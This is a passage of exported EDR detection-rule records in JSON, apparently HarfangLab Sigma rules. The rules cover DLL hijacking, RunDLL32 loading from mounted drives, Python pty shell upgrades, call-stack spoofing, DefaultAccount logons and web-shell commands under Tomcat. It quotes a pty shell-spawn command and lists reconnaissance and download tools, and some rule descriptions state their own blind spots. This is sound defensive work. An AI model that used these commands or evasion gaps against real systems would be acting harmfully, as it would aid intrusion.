"attack.t1027.009",
"attack.t1059"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "defc0f54-4516-4f30-b2ee-0ac0e8d9ddde",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.625508Z",
"creation_date": "2026-03-23T11:45:34.625510Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625515Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://scythe.io/threat-thursday/threat-thursday-evading-defenses-with-iso-files-like-nobelium",
"https://attack.mitre.org/techniques/T1204/",
"https://attack.mitre.org/techniques/T1218/011/"
],
"name": "t1204_rundll32_from_mounted_drive.yml",
"content": "title: DLL in Mounted Drive Loaded via RunDLL32\nid: defc0f54-4516-4f30-b2ee-0ac0e8d9ddde\ndescription: |\n Detects the loading of a DLL by RunDLL32 from a mounted drive.\n It is often the result of a spearphishing attack via a removable media such as a compromised USB key or via an ISO or IMG file.\n Attackers may abuse it to gain execution and to avoid detection.\n It is recommended to check the executed binary for malicious behavior or content.\nreferences:\n - https://scythe.io/threat-thursday/threat-thursday-evading-defenses-with-iso-files-like-nobelium\n - https://attack.mitre.org/techniques/T1204/\n - https://attack.mitre.org/techniques/T1218/011/\ndate: 2025/12/10\nmodified: 2025/12/19\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204\n - attack.defense_evasion\n - attack.t1218.011\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.USB\n - classification.Windows.Behavior.InitialAccess\n - classification.Windows.Behavior.Phishing\nlogsource:\n category: library_event\n product: windows\ndetection:\n selection:\n ProcessOriginalFileName: 'RUNDLL32.EXE'\n ImageLoadedDriveType:\n - 'removable'\n - 'disk_image'\n\n filter_signed:\n Signed: 'true'\n\n exclusion_legit_libraries:\n ImageLoaded|endswith:\n - '\\RocketDock\\App\\RocketDock\\RocketDock.dll'\n - '\\_cdres\\_exe\\Install Navigator\\E_UPWJ01.dll'\n - '\\LIB\\TESTPRINT64.DLL'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "defc0f54-4516-4f30-b2ee-0ac0e8d9ddde",
"rule_name": "DLL in Mounted Drive Loaded via RunDLL32",
"rule_description": "Detects the loading of a DLL by RunDLL32 from a removable drive or a mounted disk image.\nIt is often the result of a spearphishing attack delivered via removable media such as a compromised USB key, or via an ISO or IMG file that the victim mounts.\nAttackers may abuse it to gain execution and to avoid detection.\nIt is recommended to check the loaded DLL for malicious behavior or content.\nNote that any DLL flagged as signed is excluded regardless of the signer, so a payload signed with a purchased or stolen certificate would not be reported by this rule.\n",
"rule_creation_date": "2025-12-10",
"rule_modified_date": "2025-12-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1204",
"attack.t1218.011"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "defd80da-a76f-493b-a3e0-92af72fd97bc",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618196Z",
"creation_date": "2026-03-23T11:45:34.618198Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618203Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://wiki.zacheller.dev/pentest/privilege-escalation/spawning-a-tty-shell",
"https://attack.mitre.org/techniques/T1059/006/"
],
"name": "t1059_006_interactive_shell_python_macos.yml",
"content": "title: Interactive Shell Spawned via Python (macOS)\nid: defd80da-a76f-493b-a3e0-92af72fd97bc\ndescription: |\n Detects a suspicious command line related to an interactive shell execution via Python.\n Attackers sometimes obtain a simple reverse shell without having a TTY, which limits the interactions with the system.\n To launch command lines like su or sudo, the attacker needs to obtain an interactive shell.\n It is recommended to investigate the parent and children processes of the python process for any suspicious activities.\nreferences:\n - https://wiki.zacheller.dev/pentest/privilege-escalation/spawning-a-tty-shell\n - https://attack.mitre.org/techniques/T1059/006/\ndate: 2022/11/14\nmodified: 2025/01/20\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.006\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Script.Python\n - classification.macOS.Behavior.RemoteShell\nlogsource:\n category: process_creation\n product: macos\ndetection:\n # python -c 'import pty; pty.spawn(\"/bin/sh\")'\n selection_command:\n CommandLine|contains|all:\n - 'python'\n - 'import pty'\n - ';'\n - '.spawn('\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "defd80da-a76f-493b-a3e0-92af72fd97bc",
"rule_name": "Interactive Shell Spawned via Python (macOS)",
"rule_description": "Detects a Python command line that spawns an interactive shell through the pty module (e.g. python -c 'import pty; pty.spawn(\"/bin/sh\")').\nAttackers often obtain a simple reverse shell without a TTY, which limits their interactions with the system.\nTo run commands that require a terminal, such as su or sudo, the attacker needs to upgrade to an interactive (TTY) shell.\nIt is recommended to investigate the parent and child processes of the python process for any suspicious activity.\n",
"rule_creation_date": "2022-11-14",
"rule_modified_date": "2025-01-20",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "df65ef88-956a-4cd6-aaaa-54467067c5ac",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.616583Z",
"creation_date": "2026-03-23T11:45:34.616587Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.616594Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://labs.withsecure.com/publications/spoofing-call-stacks-to-confuse-edrs",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_process_callstack_spoofing_vulcan_raven.yml",
"content": "title: Spoofed Process Call Stack Related to VulcanRaven\nid: df65ef88-956a-4cd6-aaaa-54467067c5ac\ndescription: |\n Detects arbitrary call stacks related to the VulcanRaven PoC.\n VulcanRaven employs call stack spoofing techniques to evade detection by EDR solutions, it manipulates thread call stacks to appear as legitimate Windows system operations, making malicious activities blend in with normal system behavior.\n Attackers may try to bypass EDR behavioral detection by forging call stacks that mimic trusted system processes and libraries, thereby evading stack-based heuristics and memory analysis.\n It is recommended to investigate the source process, validate the legitimacy of the call chain, examine memory for inconsistencies, and correlate with other suspicious activities from the same process or parent process.\nreferences:\n - https://labs.withsecure.com/publications/spoofing-call-stacks-to-confuse-edrs\n - https://attack.mitre.org/techniques/T1055/\ndate: 2025/08/25\nmodified: 2025/11/25\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.MemoryExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection_wmi_callstack:\n MinimalStackTrace|contains|all:\n - 'kernelbase.dll'\n - 'CorperfmonExt.dll'\n - 'kernel32.dll'\n - 'ntdll.dll'\n StackTrace|contains:\n - 'CorperfmonExt.dll+0xc669'\n - 'CorperfmonExt.dll+0xc71b'\n - 'CorperfmonExt.dll+0x2fde'\n\n selection_sysmain_callstack:\n MinimalStackTrace|contains|all:\n - 'kernelbase.dll'\n - 'sysmain.dll'\n - 'svchost.exe'\n - 'sechost.dll'\n StackTrace|contains:\n - 'sysmain.dll+0x80e5f'\n - 'sysmain.dll+0x60ce6'\n - 'sysmain.dll+0x2a7d3'\n\n selection_rpc_callstack:\n MinimalStackTrace|contains|all:\n - 'kernelbase.dll'\n - 
'lsm.dll'\n - 'RPCRT4.dll'\n StackTrace|contains:\n - 'RPCRT4.dll+0x79633'\n - 'RPCRT4.dll+0x13711'\n - 'RPCRT4.dll+0xdd77b'\n - 'lsm.dll+0xe959'\n\n condition: 1 of selection_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "df65ef88-956a-4cd6-aaaa-54467067c5ac",
"rule_name": "Spoofed Process Call Stack Related to VulcanRaven",
"rule_description": "Detects spoofed call stacks matching those synthesized by the VulcanRaven proof of concept (frames in CorperfmonExt.dll, sysmain.dll or RPCRT4.dll/lsm.dll at fixed offsets).\nVulcanRaven employs call stack spoofing to evade detection by EDR solutions: it manipulates thread call stacks so that they appear to originate from legitimate Windows system operations, making malicious activity blend in with normal system behavior.\nAttackers may try to bypass EDR behavioral detection by forging call stacks that mimic trusted system processes and libraries, thereby evading stack-based heuristics and memory analysis.\nIt is recommended to investigate the source process, validate the legitimacy of the call chain, examine memory for inconsistencies, and correlate with other suspicious activities from the same process or parent process.\nNote that the rule keys on exact module offsets, which are tied to the DLL builds the PoC was observed with and may not match on other Windows builds or against a modified tool.\n",
"rule_creation_date": "2025-08-25",
"rule_modified_date": "2025-11-25",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "df7adcea-e208-4cf1-b679-655e413d9d58",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.588551Z",
"creation_date": "2026-03-23T11:45:34.588554Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.588562Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_bdehdcfg.yml",
"content": "title: DLL Hijacking via BdeHdCfg.exe\nid: df7adcea-e208-4cf1-b679-655e413d9d58\ndescription: |\n Detects potential Windows DLL Hijacking via BdeHdCfg.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'BdeHdCfg.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dbghelp.dll'\n - '\\winbrand.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files (x86)\\cisco systems\\cisco jabber\\'\n - '?:\\Program Files (x86)\\microsoft office\\root\\office*\\'\n - '?:\\Program Files (x86)\\microsoft office\\root\\vfs\\programfilesx86\\microsoft analysis services\\as oledb\\140\\'\n - '?:\\Program Files (x86)\\windows kits\\10\\debuggers\\arm64\\'\n - '?:\\Program Files (x86)\\windows kits\\10\\debuggers\\arm64\\srcsrv\\'\n - '?:\\Program Files 
(x86)\\windows kits\\10\\debuggers\\arm\\'\n - '?:\\Program Files (x86)\\windows kits\\10\\debuggers\\arm\\srcsrv\\'\n - '?:\\Program Files (x86)\\windows kits\\10\\debuggers\\x64\\'\n - '?:\\Program Files (x86)\\windows kits\\10\\debuggers\\x64\\srcsrv\\'\n - '?:\\Program Files (x86)\\windows kits\\10\\debuggers\\x86\\'\n - '?:\\Program Files (x86)\\windows kits\\10\\debuggers\\x86\\srcsrv\\'\n - '?:\\Program Files\\cisco systems\\cisco jabber\\'\n - '?:\\Program Files\\microsoft office\\root\\office*\\'\n - '?:\\Program Files\\microsoft office\\root\\vfs\\programfilesx86\\microsoft analysis services\\as oledb\\140\\'\n - '?:\\Program Files\\windows kits\\10\\debuggers\\arm64\\'\n - '?:\\Program Files\\windows kits\\10\\debuggers\\arm64\\srcsrv\\'\n - '?:\\Program Files\\windows kits\\10\\debuggers\\arm\\'\n - '?:\\Program Files\\windows kits\\10\\debuggers\\arm\\srcsrv\\'\n - '?:\\Program Files\\windows kits\\10\\debuggers\\x64\\'\n - '?:\\Program Files\\windows kits\\10\\debuggers\\x64\\srcsrv\\'\n - '?:\\Program Files\\windows kits\\10\\debuggers\\x86\\'\n - '?:\\Program Files\\windows kits\\10\\debuggers\\x86\\srcsrv\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "df7adcea-e208-4cf1-b679-655e413d9d58",
"rule_name": "DLL Hijacking via BdeHdCfg.exe",
"rule_description": "Detects potential Windows DLL hijacking via BdeHdCfg.exe, i.e. the Microsoft-signed binary loading a dbghelp.dll or winbrand.dll that is not signed by Microsoft Windows from outside the Windows system directories and a short allow-list of application folders.\nDLL hijacking takes advantage of the default Windows search order by placing a malicious DLL alongside a legitimate application so that it is loaded instead of the genuine library.\nAttackers use this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e0209ce2-3915-47cb-8a9b-7705ee65e84b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072471Z",
"creation_date": "2026-03-23T11:45:34.072473Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072477Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts#defaultaccount",
"https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/",
"https://thedfirreport.com/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/",
"https://attack.mitre.org/techniques/T1078/001/"
],
"name": "t1078_001_defaultaccount_authentication.yml",
"content": "title: DefaultAccount Account Authentication\nid: e0209ce2-3915-47cb-8a9b-7705ee65e84b\ndescription: |\n Detects authentication of the DefaultAccount account, also known as the Default System Managed Account (DSMA).\n This account is disabled by default and can be used by attackers to maintain access to victim system via a persistence.\n It is recommended to investigate action made within the newly created session.\nreferences:\n - https://learn.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts#defaultaccount\n - https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/\n - https://thedfirreport.com/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/\n - https://attack.mitre.org/techniques/T1078/001/\ndate: 2023/12/12\nmodified: 2025/01/09\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.initial_access\n - attack.t1078.001\n - classification.Windows.Source.EventLog\n - classification.Windows.Behavior.AccountManipulation\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n service: security\ndetection:\n selection_eventid:\n Source: 'Microsoft-Windows-Security-Auditing'\n EventID: 4624\n LogonType:\n - '3'\n - '10'\n\n selection_account:\n - TargetUserSid|endswith: '-503'\n - SubjectUserSid|endswith: '-503'\n\n condition: all of selection_*\nlevel: high\n# level: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e0209ce2-3915-47cb-8a9b-7705ee65e84b",
"rule_name": "DefaultAccount Account Authentication",
"rule_description": "Detects a network (logon type 3) or RemoteInteractive (logon type 10) authentication involving the DefaultAccount account (RID 503), also known as the Default System Managed Account (DSMA).\nThis account is disabled by default; attackers who enable it can use it to maintain access to a victim system as a persistence mechanism.\nIt is recommended to investigate the actions performed within the newly created session.\n",
"rule_creation_date": "2023-12-12",
"rule_modified_date": "2025-01-09",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.initial_access",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1078.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e021ad68-b12f-4190-b70f-e79e622e5860",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.296440Z",
"creation_date": "2026-03-23T11:45:35.296442Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.296447Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF",
"https://attack.mitre.org/techniques/T1203/",
"https://attack.mitre.org/techniques/T1505/003/"
],
"name": "t1203_tomcat_suspicious_command.yml",
"content": "title: Suspicious Command Executed by Tomcat\nid: e021ad68-b12f-4190-b70f-e79e622e5860\ndescription: |\n Detects the execution of a suspicious command by the Tomcat web server software likely related to a web shell or a command injection via a vulnerable application.\n Adversaries may backdoor web servers with web shells to establish persistent access to systems.\n It is recommended to verify the legitimacy of this command and check any other command executed by the Tomcat server.\nreferences:\n - https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF\n - https://attack.mitre.org/techniques/T1203/\n - https://attack.mitre.org/techniques/T1505/003/\ndate: 2023/04/11\nmodified: 2026/02/23\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1203\n - attack.persistence\n - attack.t1505.003\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Exploitation\n - classification.Linux.Behavior.InitialAccess\n - classification.Linux.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_user:\n User:\n - 'root'\n - 'www-data'\n - 'tomcat'\n - 'web'\n\n # NOTE: Tomcat is executed via java and its main class is 'org.apache.catalina.startup.Bootstrap'\n selection_parent:\n ParentImage|endswith: 'java'\n ParentCommandLine|contains: 'org.apache.catalina.startup.Bootstrap'\n selection_grandparent:\n GrandparentImage|endswith: 'java'\n GrandparentCommandLine|contains: 'org.apache.catalina.startup.Bootstrap'\n\n selection_image:\n - Image|endswith:\n - '/wget'\n - '/wget2' # https://discussion.fedoraproject.org/t/f40-change-proposal-wget2-as-wget/96422\n - '/curl'\n - '/cat'\n - '/crontab'\n - '/hostname'\n - '/ifconfig'\n - '/ip'\n - '/iptables'\n - '/ls'\n - '/netstat'\n - '/pwd'\n - '/route'\n - '/whoami'\n - '/w'\n # To many false positive\n #- '/uname'\n - CommandLine|contains: 'sh -c uname'\n\n exclusion_iparapheur_pdf:\n 
CommandLine: 'curl --silent -G -f*--data-urlencode command=*/opt/iParapheur/*'\n\n exclusion_grangle:\n - CommandLine:\n - 'cat /GRANGLE/*/versions'\n - 'ls -1 /GRANGLE/appserver/*'\n - 'ls /GRANGLE/*'\n - CommandLine|startswith: 'ls -pAHL /'\n Ancestors|contains: '/GRANGLE/appserver/'\n\n exclusion_lsprodpid:\n CommandLine: 'ls -f /proc/*/fd'\n\n exclusion_aptare:\n CommandLine: 'hostname --fqdn'\n CurrentDirectory: '/opt/aptare/bin/'\n\n exclusion_soffice:\n CommandLine: '/bin/domainname'\n Ancestors|contains:\n - '/opt/openoffice4/program/soffice.bin|'\n - '/opt/openoffice.org/program/soffice.bin|'\n - '/opt/openoffice.org?/program/soffice.bin|'\n\n exclusion_arcsight:\n CommandLine:\n - '/bin/hostname'\n - '/bin/netstat -an'\n CurrentDirectory|contains: '/arcsight/'\n\n condition: selection_user and (selection_parent or selection_grandparent) and selection_image and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e021ad68-b12f-4190-b70f-e79e622e5860",
"rule_name": "Suspicious Command Executed by Tomcat",
"rule_description": "Detects the execution of a suspicious command by the Tomcat web server software, likely related to a web shell or a command injection via a vulnerable application.\nAdversaries may backdoor web servers with web shells to establish persistent access to systems.\nIt is recommended to verify the legitimacy of this command and check any other commands executed by the Tomcat server.\n",
"rule_creation_date": "2023-04-11",
"rule_modified_date": "2026-02-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1203",
"attack.t1505.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e06d3a0a-a3d4-4ef3-86b9-365b9bc9ccd1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081188Z",
"creation_date": "2026-03-23T11:45:34.081190Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081195Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_sethc.yml",
"content": "title: DLL Hijacking via sethc.exe\nid: e06d3a0a-a3d4-4ef3-86b9-365b9bc9ccd1\ndescription: |\n Detects potential Windows DLL Hijacking via sethc.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'sethc.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dui70.dll'\n - '\\oleacc.dll'\n - '\\playsndsrv.dll'\n - '\\uxtheme.dll'\n - '\\wtsapi32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e06d3a0a-a3d4-4ef3-86b9-365b9bc9ccd1",
"rule_name": "DLL Hijacking via sethc.exe",
"rule_description": "Detects potential Windows DLL Hijacking via sethc.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
